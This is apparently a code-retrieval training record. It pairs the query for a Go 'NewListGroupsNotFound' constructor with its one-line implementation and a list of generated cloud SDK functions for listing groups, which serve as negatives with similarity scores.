\"GET\",\n\t\tPathPattern: \"/reporting/v1/public/namespaces/{namespace}/reasonGroups\",\n\t\tProducesMediaTypes: []string{\"application/json\"},\n\t\tConsumesMediaTypes: []string{\"application/json\"},\n\t\tSchemes: []string{\"https\"},\n\t\tParams: params,\n\t\tReader: &PublicListReasonGroupsReader{formats: a.formats},\n\t\tAuthInfo: authInfo,\n\t\tContext: params.Context,\n\t\tClient: params.HTTPClient,\n\t})\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\tswitch v := result.(type) {\n\n\tcase *PublicListReasonGroupsOK:\n\t\treturn v, nil, nil\n\n\tcase *PublicListReasonGroupsInternalServerError:\n\t\treturn nil, v, nil\n\n\tdefault:\n\t\treturn nil, nil, fmt.Errorf(\"Unexpected Type %v\", reflect.TypeOf(v))\n\t}\n}", "func (client *DataCollectionEndpointsClient) listByResourceGroupCreateRequest(ctx context.Context, resourceGroupName string, options *DataCollectionEndpointsListByResourceGroupOptions) (*policy.Request, error) {\n\turlPath := \"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Insights/dataCollectionEndpoints\"\n\tif client.subscriptionID == \"\" {\n\t\treturn nil, errors.New(\"parameter client.subscriptionID cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{subscriptionId}\", url.PathEscape(client.subscriptionID))\n\tif resourceGroupName == \"\" {\n\t\treturn nil, errors.New(\"parameter resourceGroupName cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{resourceGroupName}\", url.PathEscape(resourceGroupName))\n\treq, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.ep, urlPath))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treqQP := req.Raw().URL.Query()\n\treqQP.Set(\"api-version\", \"2021-04-01\")\n\treq.Raw().URL.RawQuery = reqQP.Encode()\n\treq.Raw().Header.Set(\"Accept\", \"application/json\")\n\treturn req, nil\n}", "func (client Client) ListByResourceGroupSender(req *http.Request) (*http.Response, error) {\n\treturn autorest.SendWithSender(client, req)\n}", "func CreateExclusionGroup(settings *playfab.Settings, postData *CreateExclusionGroupRequestModel, entityToken string) (*CreateExclusionGroupResultModel, error) {\r\n if entityToken == \"\" {\n return nil, playfab.NewCustomError(\"entityToken should not be an empty string\", playfab.ErrorGeneric)\n }\r\n b, errMarshal := json.Marshal(postData)\r\n if errMarshal != nil {\r\n return nil, playfab.NewCustomError(errMarshal.Error(), playfab.ErrorMarshal)\r\n }\r\n\r\n sourceMap, err := playfab.Request(settings, b, \"/Experimentation/CreateExclusionGroup\", \"X-EntityToken\", entityToken)\r\n if err != nil {\r\n return nil, err\r\n }\r\n \r\n result := &CreateExclusionGroupResultModel{}\r\n\r\n config := mapstructure.DecoderConfig{\r\n DecodeHook: playfab.StringToDateTimeHook,\r\n Result: result,\r\n }\r\n \r\n decoder, errDecoding := mapstructure.NewDecoder(&config)\r\n if errDecoding != nil {\r\n return nil, playfab.NewCustomError(errDecoding.Error(), playfab.ErrorDecoding)\r\n }\r\n \r\n errDecoding = decoder.Decode(sourceMap)\r\n if errDecoding != nil {\r\n return nil, playfab.NewCustomError(errDecoding.Error(), playfab.ErrorDecoding)\r\n }\r\n\r\n return result, nil\r\n}", "func listGroups(cmd *cobra.Command, args []string) error {\n\tclient, err := getClient()\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\treturn nil\n\t}\n\tdefer client.Close()\n\n\tvar matchingGroups map[string]bool\n\tif len(args) != 0 {\n\t\t// Mark all groups mentioned on the command line\n\t\tmatchingGroups = make(map[string]bool, len(args))\n\t\tfor _, g := range args {\n\t\t\tmatchingGroups[g] = true\n\t\t}\n\t}\n\t// Get list of all groups and their roles\n\t_, roleGroups, err := getRoles(cmd, nil, true, client)\n\tif err != nil {\n\t\tfmt.Println(toAPIError(err))\n\t\treturn nil\n\t}\n\n\tgroupMap := make(groupMap)\n\tfor roleName, groups := range roleGroups {\n\t\tfor _, group := range groups {\n\t\t\tif matchingGroups != nil && !matchingGroups[group] {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tgroupMap[group] = append(groupMap[group], roleName)\n\t\t}\n\t}\n\n\t// Get sorted list of groups\n\tgroups := make([]string, 0, len(groupMap))\n\tfor group := range groupMap {\n\t\tgroups = append(groups, group)\n\t}\n\tsort.Strings(groups)\n\n\t// Display all groups\n\tverbose := viper.GetBool(verboseOpt)\n\tfor _, group := range groups {\n\t\tif verbose {\n\t\t\tfmt.Println(group, \"=\", strings.Join(groupMap[group], \", \"))\n\t\t} else {\n\t\t\tfmt.Println(group)\n\t\t}\n\t}\n\n\treturn nil\n}", "func (client *CassandraClustersClient) listByResourceGroupCreateRequest(ctx context.Context, resourceGroupName string, options *CassandraClustersClientListByResourceGroupOptions) (*policy.Request, error) {\n\turlPath := \"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/cassandraClusters\"\n\tif client.subscriptionID == \"\" {\n\t\treturn nil, errors.New(\"parameter client.subscriptionID cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{subscriptionId}\", url.PathEscape(client.subscriptionID))\n\tif resourceGroupName == \"\" {\n\t\treturn nil, errors.New(\"parameter resourceGroupName cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{resourceGroupName}\", url.PathEscape(resourceGroupName))\n\treq, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.internal.Endpoint(), urlPath))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treqQP := req.Raw().URL.Query()\n\treqQP.Set(\"api-version\", \"2023-03-15-preview\")\n\treq.Raw().URL.RawQuery = reqQP.Encode()\n\treq.Raw().Header[\"Accept\"] = []string{\"application/json\"}\n\treturn req, nil\n}", "func (client DataControllersClient) ListInGroupPreparer(ctx context.Context, resourceGroupName string) (*http.Request, error) {\n\tpathParameters := map[string]interface{}{\n\t\t\"resourceGroupName\": autorest.Encode(\"path\", resourceGroupName),\n\t\t\"subscriptionId\": autorest.Encode(\"path\", client.SubscriptionID),\n\t}\n\n\tconst APIVersion = \"2019-07-24-preview\"\n\tqueryParameters := map[string]interface{}{\n\t\t\"api-version\": APIVersion,\n\t}\n\n\tpreparer := autorest.CreatePreparer(\n\t\tautorest.AsGet(),\n\t\tautorest.WithBaseURL(client.BaseURI),\n\t\tautorest.WithPathParameters(\"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.AzureData/dataControllers\", pathParameters),\n\t\tautorest.WithQueryParameters(queryParameters))\n\treturn preparer.Prepare((&http.Request{}).WithContext(ctx))\n}", "func (client *WorkspacesClient) listByResourceGroupCreateRequest(ctx context.Context, resourceGroupName string, options *WorkspacesListByResourceGroupOptions) (*policy.Request, error) {\n\turlPath := \"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Databricks/workspaces\"\n\tif resourceGroupName == \"\" {\n\t\treturn nil, errors.New(\"parameter resourceGroupName cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{resourceGroupName}\", url.PathEscape(resourceGroupName))\n\tif client.subscriptionID == \"\" {\n\t\treturn nil, errors.New(\"parameter client.subscriptionID cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{subscriptionId}\", url.PathEscape(client.subscriptionID))\n\treq, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.ep, urlPath))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treqQP := req.Raw().URL.Query()\n\treqQP.Set(\"api-version\", \"2021-04-01-preview\")\n\treq.Raw().URL.RawQuery = reqQP.Encode()\n\treq.Raw().Header.Set(\"Accept\", \"application/json\")\n\treturn req, nil\n}", "func NewListRegistryProviderTypesForbidden() *ListRegistryProviderTypesForbidden {\n\treturn &ListRegistryProviderTypesForbidden{}\n}", "func NewDefaultGroups(ctx *pulumi.Context,\n\tname string, args *DefaultGroupsArgs, opts ...pulumi.ResourceOption) (*DefaultGroups, error) {\n\tif args == nil || args.GroupIds == nil {\n\t\treturn nil, errors.New(\"missing required argument 'GroupIds'\")\n\t}\n\tif args == nil || args.RealmId == nil {\n\t\treturn nil, errors.New(\"missing required argument 'RealmId'\")\n\t}\n\tif args == nil {\n\t\targs = &DefaultGroupsArgs{}\n\t}\n\tvar resource DefaultGroups\n\terr := ctx.RegisterResource(\"keycloak:index/defaultGroups:DefaultGroups\", name, args, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func (client *ManagedInstancesClient) listByResourceGroupCreateRequest(ctx context.Context, resourceGroupName string, options *ManagedInstancesClientListByResourceGroupOptions) (*policy.Request, error) {\n\turlPath := \"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Sql/managedInstances\"\n\tif resourceGroupName == \"\" {\n\t\treturn nil, errors.New(\"parameter resourceGroupName cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{resourceGroupName}\", url.PathEscape(resourceGroupName))\n\tif client.subscriptionID == \"\" {\n\t\treturn nil, errors.New(\"parameter client.subscriptionID cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{subscriptionId}\", url.PathEscape(client.subscriptionID))\n\treq, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.internal.Endpoint(), urlPath))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treqQP := req.Raw().URL.Query()\n\tif options != nil && options.Expand != nil {\n\t\treqQP.Set(\"$expand\", *options.Expand)\n\t}\n\treqQP.Set(\"api-version\", \"2022-08-01-preview\")\n\treq.Raw().URL.RawQuery = reqQP.Encode()\n\treq.Raw().Header[\"Accept\"] = []string{\"application/json\"}\n\treturn req, nil\n}", "func (s *ServiceOp) List(ctx context.Context, input *ListGroupsInput) (*ListGroupsOutput, error) {\n\tr := client.NewRequest(http.MethodGet, \"/azure/compute/group\")\n\tresp, err := client.RequireOK(s.Client.Do(ctx, r))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tdefer resp.Body.Close()\n\n\tgs, err := groupsFromHttpResponse(resp)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn &ListGroupsOutput{Groups: gs}, nil\n}", "func (s *GroupsService) List(opt ...CallOption) ([]*Group, *Response, error) {\n\tgroups, resp, err := listGroup(s.client, \"groups\", opt...)\n\n\treturn groups, resp, err\n}", "func (q *QueryGVR) resourceListInGroup(resourceLists []*metav1.APIResourceList, group string) ([]*metav1.APIResourceList, error) {\n\tvar list []*metav1.APIResourceList\n\tfor _, rscList := range resourceLists {\n\t\tgv, err := schema.ParseGroupVersion(rscList.GroupVersion)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\n\t\tif strings.EqualFold(gv.Group, group) {\n\t\t\tlist = append(list, rscList)\n\t\t}\n\t}\n\treturn list, nil\n}", "func List(c messagebird.Client, options *messagebird.PaginationRequest) (*Groups, error) {\n\tgroupList := &Groups{}\n\tif err := c.Request(groupList, http.MethodGet, path+\"?\"+options.QueryParams(), nil); err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn groupList, nil\n}", "func (client WorkloadNetworksClient) ListVMGroupsResponder(resp *http.Response) (result WorkloadNetworkVMGroupsList, err error) {\n\terr = autorest.Respond(\n\t\tresp,\n\t\tazure.WithErrorUnlessStatusCode(http.StatusOK),\n\t\tautorest.ByUnmarshallingJSON(&result),\n\t\tautorest.ByClosing())\n\tresult.Response = autorest.Response{Response: resp}\n\treturn\n}", "func CreateSetDataLevelPermissionWhiteListResponse() (response *SetDataLevelPermissionWhiteListResponse) {\n\tresponse = &SetDataLevelPermissionWhiteListResponse{\n\t\tBaseResponse: &responses.BaseResponse{},\n\t}\n\treturn\n}", "func (client *ContainerGroupsClient) listCreateRequest(ctx context.Context, options *ContainerGroupsClientListOptions) (*policy.Request, error) {\n\turlPath := \"/subscriptions/{subscriptionId}/providers/Microsoft.ContainerInstance/containerGroups\"\n\tif client.subscriptionID == \"\" {\n\t\treturn nil, errors.New(\"parameter client.subscriptionID cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{subscriptionId}\", url.PathEscape(client.subscriptionID))\n\treq, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.internal.Endpoint(), urlPath))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treqQP := req.Raw().URL.Query()\n\treqQP.Set(\"api-version\", \"2023-05-01\")\n\treq.Raw().URL.RawQuery = reqQP.Encode()\n\treq.Raw().Header[\"Accept\"] = []string{\"application/json\"}\n\treturn req, nil\n}", "func (a *IAMApiService) GetGroups(ctx context.Context) (IamGroups, *http.Response, error) {\n\tvar (\n\t\tlocalVarHttpMethod = http.MethodGet\n\t\tlocalVarPostBody interface{}\n\t\tlocalVarFormFileName string\n\t\tlocalVarFileName string\n\t\tlocalVarFileBytes []byte\n\t\tlocalVarReturnValue IamGroups\n\t)\n\n\t// create path and map variables\n\tlocalVarPath := a.client.cfg.BasePath + \"/acs/api/v1/groups\"\n\n\tlocalVarHeaderParams := make(map[string]string)\n\tlocalVarQueryParams := url.Values{}\n\tlocalVarFormParams := url.Values{}\n\n\t// to determine the Content-Type header\n\tlocalVarHttpContentTypes := []string{}\n\n\t// set Content-Type header\n\tlocalVarHttpContentType := selectHeaderContentType(localVarHttpContentTypes)\n\tif localVarHttpContentType != \"\" {\n\t\tlocalVarHeaderParams[\"Content-Type\"] = localVarHttpContentType\n\t}\n\n\t// to determine the Accept header\n\tlocalVarHttpHeaderAccepts := []string{\"application/json\"}\n\n\t// set Accept header\n\tlocalVarHttpHeaderAccept := selectHeaderAccept(localVarHttpHeaderAccepts)\n\tif localVarHttpHeaderAccept != \"\" {\n\t\tlocalVarHeaderParams[\"Accept\"] = localVarHttpHeaderAccept\n\t}\n\tr, err := a.client.prepareRequest(ctx, localVarPath, localVarHttpMethod, localVarPostBody, localVarHeaderParams, localVarQueryParams, localVarFormParams, localVarFormFileName, localVarFileName, localVarFileBytes)\n\tif err != nil {\n\t\treturn localVarReturnValue, nil, err\n\t}\n\n\tlocalVarHttpResponse, err := a.client.callAPI(r)\n\tif err != nil || localVarHttpResponse == nil {\n\t\treturn localVarReturnValue, localVarHttpResponse, err\n\t}\n\n\tlocalVarBody, err := ioutil.ReadAll(localVarHttpResponse.Body)\n\tlocalVarHttpResponse.Body.Close()\n\tif err != nil {\n\t\treturn localVarReturnValue, localVarHttpResponse, err\n\t}\n\n\tif localVarHttpResponse.StatusCode >= 300 {\n\t\tnewErr := GenericOpenAPIError{\n\t\t\tbody: localVarBody,\n\t\t\terror: localVarHttpResponse.Status,\n\t\t}\n\t\tif localVarHttpResponse.StatusCode == 200 {\n\t\t\tvar v IamGroups\n\t\t\terr = a.client.decode(&v, localVarBody, localVarHttpResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t\t}\n\t\tif localVarHttpResponse.StatusCode == 0 {\n\t\t\tvar v IamError\n\t\t\terr = a.client.decode(&v, localVarBody, localVarHttpResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t\t}\n\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t}\n\n\terr = a.client.decode(&localVarReturnValue, localVarBody, localVarHttpResponse.Header.Get(\"Content-Type\"))\n\tif err != nil {\n\t\tnewErr := GenericOpenAPIError{\n\t\t\tbody: localVarBody,\n\t\t\terror: err.Error(),\n\t\t}\n\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t}\n\n\treturn localVarReturnValue, localVarHttpResponse, nil\n}", "func (s *ServiceOp) List(ctx context.Context, input *ListGroupsInput) (*ListGroupsOutput, error) {\n\tr := client.NewRequest(http.MethodGet, \"/compute/azure/group\")\n\tresp, err := client.RequireOK(s.Client.Do(ctx, r))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tdefer resp.Body.Close()\n\n\tgs, err := groupsFromHttpResponse(resp)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn &ListGroupsOutput{Groups: gs}, nil\n}", "func CreateListExperimentGroupsResponse() (response *ListExperimentGroupsResponse) {\n\tresponse = &ListExperimentGroupsResponse{\n\t\tBaseResponse: &responses.BaseResponse{},\n\t}\n\treturn\n}", "func (c *client) GroupListToken(groupName string) ([]sdk.Token, error) {\n\tpath := fmt.Sprintf(\"/group/%s/token\", url.QueryEscape(groupName))\n\n\ttokens := []sdk.Token{}\n\t_, err := c.GetJSON(path, &tokens)\n\n\treturn tokens, err\n}", "func (client *AvailabilityGroupListenersClient) listByGroupCreateRequest(ctx context.Context, resourceGroupName string, sqlVirtualMachineGroupName string, options *AvailabilityGroupListenersClientListByGroupOptions) (*policy.Request, error) {\n\turlPath := \"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.SqlVirtualMachine/sqlVirtualMachineGroups/{sqlVirtualMachineGroupName}/availabilityGroupListeners\"\n\tif resourceGroupName == \"\" {\n\t\treturn nil, errors.New(\"parameter resourceGroupName cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{resourceGroupName}\", url.PathEscape(resourceGroupName))\n\tif sqlVirtualMachineGroupName == \"\" {\n\t\treturn nil, errors.New(\"parameter sqlVirtualMachineGroupName cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{sqlVirtualMachineGroupName}\", url.PathEscape(sqlVirtualMachineGroupName))\n\tif client.subscriptionID == \"\" {\n\t\treturn nil, errors.New(\"parameter client.subscriptionID cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{subscriptionId}\", url.PathEscape(client.subscriptionID))\n\treq, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.internal.Endpoint(), urlPath))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treqQP := req.Raw().URL.Query()\n\treqQP.Set(\"api-version\", \"2022-08-01-preview\")\n\treq.Raw().URL.RawQuery = reqQP.Encode()\n\treq.Raw().Header[\"Accept\"] = []string{\"application/json\"}\n\treturn req, nil\n}", "func NewQueryForbiddenInfoListRequestWithoutParam() *QueryForbiddenInfoListRequest {\n\n return &QueryForbiddenInfoListRequest{\n JDCloudRequest: core.JDCloudRequest{\n URL: \"/forbiddenInfo:query\",\n Method: \"POST\",\n Header: nil,\n Version: \"v1\",\n },\n }\n}", "func (client *MetricAlertsClient) listByResourceGroupCreateRequest(ctx context.Context, resourceGroupName string, options *MetricAlertsClientListByResourceGroupOptions) (*policy.Request, error) {\n\turlPath := \"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Insights/metricAlerts\"\n\tif client.subscriptionID == \"\" {\n\t\treturn nil, errors.New(\"parameter client.subscriptionID cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{subscriptionId}\", url.PathEscape(client.subscriptionID))\n\tif resourceGroupName == \"\" {\n\t\treturn nil, errors.New(\"parameter resourceGroupName cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{resourceGroupName}\", url.PathEscape(resourceGroupName))\n\treq, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.internal.Endpoint(), urlPath))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treqQP := req.Raw().URL.Query()\n\treqQP.Set(\"api-version\", \"2018-03-01\")\n\treq.Raw().URL.RawQuery = reqQP.Encode()\n\treq.Raw().Header[\"Accept\"] = []string{\"application/json\"}\n\treturn req, nil\n}", "func (c ApiWrapper) Forbidden(msg string, objs ...interface{}) revel.Result {\n\treturn c.renderErrorString(403, fmt.Sprintf(msg, objs))\n}" ]
[ "0.6481354", "0.63941246", "0.6109768", "0.5942938", "0.5937463", "0.5933636", "0.5757323", "0.5738157", "0.5690592", "0.5634998", "0.5624124", "0.55764693", "0.5573737", "0.5562796", "0.5555221", "0.552152", "0.55055183", "0.5485115", "0.5476348", "0.54459757", "0.54165435", "0.54130036", "0.5411465", "0.53728276", "0.5366386", "0.53641224", "0.53616637", "0.53584856", "0.5357241", "0.53430027", "0.53415877", "0.533345", "0.53247714", "0.5318445", "0.53100884", "0.5309202", "0.5308899", "0.5308203", "0.5267075", "0.5261613", "0.5250847", "0.5241561", "0.52276933", "0.5222303", "0.521699", "0.521699", "0.52080864", "0.5205452", "0.5174263", "0.5172919", "0.5172206", "0.5169416", "0.51677793", "0.5166503", "0.51655996", "0.5161141", "0.51603234", "0.5159927", "0.5157961", "0.515396", "0.51498365", "0.5142708", "0.51362026", "0.51300776", "0.51254594", "0.51104915", "0.509762", "0.5091556", "0.50880456", "0.5087654", "0.507986", "0.5075829", "0.5070557", "0.5068948", "0.50687605", "0.5062787", "0.50625014", "0.5061388", "0.50611514", "0.5058161", "0.50567573", "0.5056225", "0.5053482", "0.5048256", "0.50433457", "0.50388706", "0.50341177", "0.5032854", "0.5031695", "0.5028354", "0.50252914", "0.5022048", "0.50179756", "0.50165874", "0.5014623", "0.50027263", "0.49973196", "0.49960735", "0.49859577", "0.4982028" ]
0.7673657
0
NewListGroupsNotFound creates a ListGroupsNotFound with default headers values
func NewListGroupsNotFound() *ListGroupsNotFound { return &ListGroupsNotFound{} }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func NewListGroupsDefault(code int) *ListGroupsDefault {\n\treturn &ListGroupsDefault{\n\t\t_statusCode: code,\n\t}\n}", "func NewListGroupsBadRequest() *ListGroupsBadRequest {\n\treturn &ListGroupsBadRequest{}\n}", "func NewGetHostGroupsNotFound() *GetHostGroupsNotFound {\n\treturn &GetHostGroupsNotFound{}\n}", "func NewGetAllGroupsNotFound() *GetAllGroupsNotFound {\n\n\treturn &GetAllGroupsNotFound{}\n}", "func TestGroupDataSource_DoesNotSwallowListGroupError(t *testing.T) {\n\tctrl := gomock.NewController(t)\n\tdefer ctrl.Finish()\n\n\tprojectID := uuid.New()\n\tresourceData := createResourceData(t, projectID.String(), \"group-name\")\n\n\tgraphClient := azdosdkmocks.NewMockGraphClient(ctrl)\n\tclients := &client.AggregatedClient{GraphClient: graphClient, Ctx: context.Background()}\n\n\texpectedProjectDescriptorLookupArgs := graph.GetDescriptorArgs{StorageKey: &projectID}\n\tprojectDescriptor := converter.String(\"descriptor\")\n\tprojectDescriptorResponse := graph.GraphDescriptorResult{Value: projectDescriptor}\n\tgraphClient.\n\t\tEXPECT().\n\t\tGetDescriptor(clients.Ctx, expectedProjectDescriptorLookupArgs).\n\t\tReturn(&projectDescriptorResponse, nil)\n\n\texpectedListGroupArgs := graph.ListGroupsArgs{ScopeDescriptor: projectDescriptor}\n\tgraphClient.\n\t\tEXPECT().\n\t\tListGroups(clients.Ctx, expectedListGroupArgs).\n\t\tReturn(nil, errors.New(\"ListGroups() Failed\"))\n\n\terr := dataSourceGroupRead(resourceData, clients)\n\trequire.Contains(t, err.Error(), \"ListGroups() Failed\")\n}", "func NewNotFound(name, group, resource string) error {\n\treturn errors.NewNotFound(schema.GroupResource{Group: group, Resource: resource}, name)\n}", "func NewGetGroupsByDisplayNameUsingGETNotFound() *GetGroupsByDisplayNameUsingGETNotFound {\n\treturn &GetGroupsByDisplayNameUsingGETNotFound{}\n}", "func NewGetHostGroupsDefault(code int) *GetHostGroupsDefault {\n\treturn &GetHostGroupsDefault{\n\t\t_statusCode: code,\n\t}\n}", "func NewUpdateHostGroupsNotFound() *UpdateHostGroupsNotFound {\n\treturn &UpdateHostGroupsNotFound{}\n}", "func (c *DefaultIdentityProvider) ListGroups(ctx context.Context, options *metainternal.ListOptions) (*auth.GroupList, error) {\n\tkeyword := \"\"\n\tlimit := 50\n\tif options.FieldSelector != nil {\n\t\tkeyword, _ = options.FieldSelector.RequiresExactMatch(auth.KeywordQueryTag)\n\t\tlimitStr, _ := options.FieldSelector.RequiresExactMatch(auth.QueryLimitTag)\n\t\tif li, err := strconv.Atoi(limitStr); err == nil && li > 0 {\n\t\t\tlimit = li\n\t\t}\n\t}\n\n\t_, tenantID := authentication.GetUsernameAndTenantID(ctx)\n\tif tenantID != \"\" && tenantID != c.tenantID {\n\t\treturn nil, apierrors.NewBadRequest(\"must in the same tenant\")\n\t}\n\n\tallList, err := c.localGroupLister.List(labels.Everything())\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar localGroupList []*authv1.LocalGroup\n\tfor i, item := range allList {\n\t\tif item.Spec.TenantID == c.tenantID {\n\t\t\tlocalGroupList = append(localGroupList, allList[i])\n\t\t}\n\t}\n\n\tif keyword != \"\" {\n\t\tvar newList []*authv1.LocalGroup\n\t\tfor i, val := range localGroupList {\n\t\t\tif strings.Contains(val.Name, keyword) || strings.Contains(val.Spec.DisplayName, keyword) {\n\t\t\t\tnewList = append(newList, localGroupList[i])\n\t\t\t}\n\t\t}\n\t\tlocalGroupList = newList\n\t}\n\n\titems := localGroupList[0:min(len(localGroupList), limit)]\n\n\tgroupList := auth.GroupList{}\n\tfor _, item := range items {\n\t\tgroup := convertToGroup(item)\n\t\tgroupList.Items = append(groupList.Items, group)\n\t}\n\n\treturn &groupList, nil\n}", "func getGroups(w http.ResponseWriter, r *http.Request) {\n InitResponse(&w)\n if r.Method == \"OPTIONS\" {return}\n\n allow, _ := HasPermission(&w, r, CoreGroupModuleID, CoreAccessRead)\n if !allow {\n w.WriteHeader(http.StatusUnauthorized)\n json.NewEncoder(w).Encode(&CoreMessage{\n Message: \"Not authorized!\",\n })\n return\n }\n\n groups := []CoreGroup{}\n\n err := Db.Model(&groups).Select()\n if err != nil {\n w.WriteHeader(http.StatusBadRequest)\n return\n }\n\n w.WriteHeader(http.StatusOK)\n json.NewEncoder(w).Encode(groups)\n}", "func NewDefaultGroups(ctx *pulumi.Context,\n\tname string, args *DefaultGroupsArgs, opts ...pulumi.ResourceOption) (*DefaultGroups, error) {\n\tif args == nil || args.GroupIds == nil {\n\t\treturn nil, errors.New(\"missing required argument 'GroupIds'\")\n\t}\n\tif args == nil || args.RealmId == nil {\n\t\treturn nil, errors.New(\"missing required argument 'RealmId'\")\n\t}\n\tif args == nil {\n\t\targs = &DefaultGroupsArgs{}\n\t}\n\tvar resource DefaultGroups\n\terr := ctx.RegisterResource(\"keycloak:index/defaultGroups:DefaultGroups\", name, args, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func (ggSession *GreengrassSession) ListGroup(name string) error {\n\tvar id string\n\n\tif name != \"\" {\n\t\tlistOutput, err := ggSession.greengrass.ListGroups(&greengrass.ListGroupsInput{})\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tfor _, v := range listOutput.Groups {\n\t\t\tif name == *v.Name {\n\t\t\t\tid = *v.Id\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t\tif id == \"\" {\n\t\t\treturn fmt.Errorf(\"group %s not found\", name)\n\t\t}\n\t} else {\n\t\tid = ggSession.config.Group.ID\n\t}\n\n\tgroup, err := ggSession.greengrass.GetGroup(&greengrass.GetGroupInput{\n\t\tGroupId: &id,\n\t})\n\tif err != nil {\n\t\treturn err\n\t}\n\tfmt.Printf(\"group: %v\\n\", group)\n\n\tif group.LatestVersion == nil {\n\t\treturn nil\n\t}\n\n\tgroupVersion, err := ggSession.greengrass.GetGroupVersion(&greengrass.GetGroupVersionInput{\n\t\tGroupId: group.Id,\n\t\tGroupVersionId: group.LatestVersion,\n\t})\n\tif err != nil {\n\t\treturn err\n\t}\n\tfmt.Printf(\"group version: %v\\n\", groupVersion)\n\n\treturn nil\n}", "func NewGetUniverseGroupsGroupIDNotFound() *GetUniverseGroupsGroupIDNotFound {\n\treturn &GetUniverseGroupsGroupIDNotFound{}\n}", "func NewPostVolumeGroupsListDefault(code int) *PostVolumeGroupsListDefault {\n\treturn &PostVolumeGroupsListDefault{\n\t\t_statusCode: code,\n\t}\n}", "func NewGetCustomerGroupsNotFound() *GetCustomerGroupsNotFound {\n\treturn &GetCustomerGroupsNotFound{}\n}", "func (o *ListGroupsDefault) Code() int {\n\treturn o._statusCode\n}", "func NewListServerGroupBadRequest() *ListServerGroupBadRequest {\n\treturn &ListServerGroupBadRequest{}\n}", "func NewUpdateHostGroupsDefault(code int) *UpdateHostGroupsDefault {\n\treturn &UpdateHostGroupsDefault{\n\t\t_statusCode: code,\n\t}\n}", "func NewListGroupsOK() *ListGroupsOK {\n\treturn &ListGroupsOK{}\n}", "func TestGroupDataSource_DoesNotSwallowProjectDescriptorLookupError_NotFound(t *testing.T) {\n\tctrl := gomock.NewController(t)\n\tdefer ctrl.Finish()\n\n\tprojectID := uuid.New()\n\tresourceData := createResourceData(t, projectID.String(), \"group-name\")\n\n\tgraphClient := azdosdkmocks.NewMockGraphClient(ctrl)\n\tclients := &client.AggregatedClient{GraphClient: graphClient, Ctx: context.Background()}\n\n\texpectedArgs := graph.GetDescriptorArgs{StorageKey: &projectID}\n\tgraphClient.\n\t\tEXPECT().\n\t\tGetDescriptor(clients.Ctx, expectedArgs).\n\t\tReturn(nil, azuredevops.WrappedError{\n\t\t\tStatusCode: converter.Int(404),\n\t\t})\n\n\terr := dataSourceGroupRead(resourceData, 